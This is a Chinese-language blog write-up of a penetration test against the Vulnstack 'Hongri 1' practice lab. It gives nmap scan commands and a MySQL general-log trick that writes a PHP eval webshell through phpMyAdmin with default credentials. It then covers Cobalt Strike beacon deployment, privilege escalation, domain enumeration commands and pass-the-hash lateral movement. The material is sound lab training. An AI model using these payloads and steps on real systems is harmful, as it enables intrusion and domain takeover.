首页 > 其他分享 >打靶记录-红日靶场1

打靶记录-红日靶场1

时间:2024-11-09 12:41:45浏览次数:1  
标签:161.128 红日 nmap 打靶 192.168 net 域控 靶场 日志

靶机地址

http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

按照网络拓扑搭建好环境

确认靶机

nmap -sn 192.168.161.0/24

扫开放端口

nmap -sT -p- 192.168.161.128 -oA ./ports

扫详细信息

nmap -sT -sC -sV -O 192.168.161.128 -p80,3306 -oA ./details

nmap --script=vuln -p80,3306 192.168.161.128 -oA ./vuln

web渗透

访问192.168.161.128:80,是一个phpstudy探针

输入root/root显示数据库连接成功,说明mysql用的默认口令,上面扫描结果中显示有phpmyadmin,直接拼接访问

利用默认密码登录到phpmyadmin

尝试写webshell,SHOW VARIABLES LIKE "secure_file_priv"查看可写文件夹

禁止写入,尝试日志写shell,select version()

mysql5.0版本以上会创建日志文件,可以通过修改日志的全局变量getshell
SHOW VARIABLES LIKE 'general%'

set global general_log = "ON";开启日志保存
日志保存的默认地址是:C:\phpStudy\MySQL\data\stu1.log。在这里可以找到绝对路径C:\phpStudy。查看探针,得到web绝对地址

set global general_log_file='C:/phpStudy/WWW/shell.php';

select '<?php eval($_POST[cmd]);?>';

用蚁剑连接

内网渗透

ipconfig,查看当前主机网卡

想了下还是用cs来测试方便点。先用cs生成后门,利用webshell上传然后执行就行了。

右键选择net view

选择elevate提权

ipconfig /all,存在域

net config Workstation

shell net user /domain,查看域控机器名跟域内用户名

右键port scan,查看内网存活ip跟端口开放情况。剩下的存活分别是192.168.52.138和192.168.52.141

ping一下域控,得到域控ip

shell wmic useraccount get /all,获取域内用户的详细信息

总结:
域名god.org
域内5用户:Administrator,Guest,krbtgt,ligang,liukaifeng01
域内3主机:stu1(192.168.52.143),owa(域控-192.168.52.138),ROOT-TVI862UBEH(192.168.52.141)
新建一个监听器,payload选择Beacon SMB,然后再派生,哈希传递就全上线了。

标签:161.128,红日,nmap,打靶,192.168,net,域控,靶场,日志
From: https://www.cnblogs.com/dg05/p/18535092

相关文章

  • 红日七靶场--Writeup
     环境下载地址http://vulnstack.qiyuanxuetang.net/vuln/detail/9/前置配置环境拓扑网络编辑(这里桥接模式的网段不能通第二层也就是52的网段,笔记中桥接模式无法联网所以使用了52的nat网段)DMZ区域:-给Ubuntu(Web1)配置了两个网卡,一个桥接可以对外提供服务;一个连接在......
  • 网络安全ctf比赛/学习资源整理,解题工具、比赛时间、解题思路、实战靶场推荐收藏!
    前言对于想学习或者参加CTF比赛的朋友来说,CTF工具、练习靶场必不可少,今天给大家分享自己收藏的CTF资源,希望能对各位有所帮助。CTF在线工具首先给大家推荐我自己常用的3个CTF在线工具网站,内容齐全,收藏备用。1、CTF在线工具箱:http://ctf.ssleye.com/包含CTF比赛中常用的编码......
  • 打靶记录-Jarbas
    靶机下载vulnhub->Jarbas确定靶机nmap-sn192.168.52.0/24靶机ip:192.168.52.130扫描全端口开放情况nmap-sT192.168.52.130-p--oA./ports详细扫开放的端口nmap-sT-sC-sV-O192.168.52.130-p22,80,3306,8080-oA./details扫udp端口开放nmap-sU--top-po......
  • 零基础‘自外网到内网’渗透过程详细记录(cc123靶场)——上
    一、网络环境示意图二、环境搭建首先将三个虚拟机使用VMware打开。接下来对虚拟机进行配置。首先配置虚拟机“护卫神主机大师(项目四)”。点击编辑虚拟机设置。发现存在两个网卡。打开虚拟网络编辑器。点击更改设置。点击添加网络。选择VM19后点击确定。根......
  • 【Pikachu靶场:XSS系列】xss之过滤,xss之htmlspecialchars,xss之herf输出,xss之js输出通关
    一、xss之过滤<svgonload=alert("过关啦")>二、xss之htmlspecialcharsjavascript:alert(123)原理:输入测试文本为herf的属性值和内容值,所以转换思路直接变为js代码OK了三、xss之href输出JavaScript:alert('假客套')原理:测试一个文本,输入提交之后,成了为了蓝色文本......
  • pikachu靶场漏洞代码分析
    pikachu靶场代码漏洞分析部署工具:phpstudyCommandInjection命令注入exec"ping"路径:http://localhost/pikachu-master/vul/rce/rce_ping.php请求方式:POST参数:ipaddress=xxx漏洞成因:利用由不可信赖的数据构建的命令来调用shell_exec()。这种调用会导致程序以攻击者的......
  • Web 靶场笔记-bWAPP
    事以密成,言以泄败。导航前言A1-Injection(注入)A2-BrokenAuth&SessionMgmt(破损的授权&会话管理)A3-Cross-SiteScripting(XSS跨站脚本)A4-InsecureDirectObjectReferences(IDOR不安全直接对象引用)A5-SecurityMisconfiguration(安全配置错误)......
  • sql注入——靶场Less1
    ?id=1?id=99'unionselect1,2,3--+查看占位?id=1'orderby3--+尝试出表有几列 ?id=1'orderby4--+说明只有三列?id=99'unionselect1,database(),3--+查询当前使用的数据库的名称?id=99'unionselect1,group_concat(table_name),3frominformation_sch......
  • 文件上传靶场1-21
    Pass-01(前端验证)因为是进行前端JS校验,因此可以直接在浏览器检查代码把checkFile()函数(即如下图红色框选中的函数)删了或者改成true,并按回车,即可成功上传php文件源码functioncheckFile(){varfile=document.getElementsByName('upload_file')[0].value;if(......
  • 第三章 权限维持-linux权限维持-隐藏-玄机靶场
    第三章权限维持-linux权限维持-隐藏-玄机靶场linux权限维持玄机靶场自用笔记。本篇文章来自lexsd6'shome师傅的分享,如有侵权请联系题目简介1.黑客隐藏的隐藏的文件完整路径md52.黑客隐藏的文件反弹shell的ip+端口{ip:port}3.黑客提权所用的命令完整路径的md5flag......